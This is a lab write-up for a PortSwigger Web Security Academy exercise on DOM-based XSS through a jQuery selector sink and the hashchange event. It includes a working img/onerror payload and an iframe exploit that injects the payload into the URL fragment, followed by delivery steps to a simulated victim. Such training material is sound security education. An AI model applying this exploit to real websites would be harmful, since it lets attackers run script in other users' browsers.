6) DOM XSS in jQuery selector sink using a hashchange event

looking at the home page source code reveals An interesting script that listens for changes in the URL hash and then attempts to scroll a specific blog post into view based on the hash value

let's try to provide some hash value in the url and see what happens

nothing happens in the page but if we look at the console we can see that an invalid hash value (non-existing title) triggers error

so what we can do is provide an xss payload in the hash value,and to make this payload get executed we will make it execute on Error Event.

since an invalid hash value (non-existing title) triggers error so this payload will be executed

<img src=x onerror="alert(1)">

there is the exploit server that I can use to prepare and deliver a custom made page. So I can create a page including an iframe to the vulnerable page. With an onload event I change the fragment which in turn triggers the hashchange event.

Exploit

<iframe src="https://0a74002203903b238482b4ac00170065.web-security-academy.net/#" onload="this.src+='<img src=x onerror=alert(1)>'"></iframe>

Detailed explanation of the code.

1. <iframe src="https://0a74002203903b238482b4ac00170065.web-security-academy.net/#"> In this line, an iframe is created and the src attribute is set to URL. The URL ends with a # symbol, which directs the target website to a section under the URL.

2. onload="this.src+='<img src=x onerror=alert(1)>'" the onload event is triggered when the iframe’s content is fully loaded. When the onload event is triggered, the this.src expression is used to modify the src attribute of the iframe. The modification aims to inject a malicious img tag into the loaded website within the iframe.

now go to the exploit server and paste the exploit in the body and then store it then deliver it to the victim (make sure you execute print() to solve the lab)

and we have solved the lab